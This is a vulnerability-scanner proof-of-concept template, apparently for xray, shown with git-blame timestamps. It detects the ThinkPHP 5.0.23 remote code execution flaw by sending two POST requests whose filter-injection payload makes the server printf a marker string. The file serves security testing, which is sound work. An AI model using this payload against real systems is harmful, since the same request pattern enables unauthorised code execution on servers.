2020-12-29 17:17:10 +08:00
|
|
|
name: poc-yaml-thinkphp5023-method-rce
|
2022-04-20 17:45:27 +08:00
|
|
|
groups:
|
|
|
|
|
poc1:
|
|
|
|
|
- method: POST
|
|
|
|
|
path: /index.php?s=captcha
|
|
|
|
|
headers:
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
body: |
|
2022-08-16 11:18:09 +08:00
|
|
|
_method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu
|
2022-04-20 17:45:27 +08:00
|
|
|
expression: |
|
2022-08-16 11:18:09 +08:00
|
|
|
response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu")
|
2022-04-20 17:45:27 +08:00
|
|
|
poc2:
|
2020-12-29 17:17:10 +08:00
|
|
|
- method: POST
|
|
|
|
|
path: /index.php?s=captcha
|
|
|
|
|
headers:
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
body: |
|
|
|
|
|
_method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1
|
|
|
|
|
expression: |
|
|
|
|
|
response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1")
|
2022-04-20 17:45:27 +08:00
|
|
|
|
2020-12-29 17:17:10 +08:00
|
|
|
detail:
|
|
|
|
|
links:
|
2022-04-20 17:45:27 +08:00
|
|
|
- https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
|
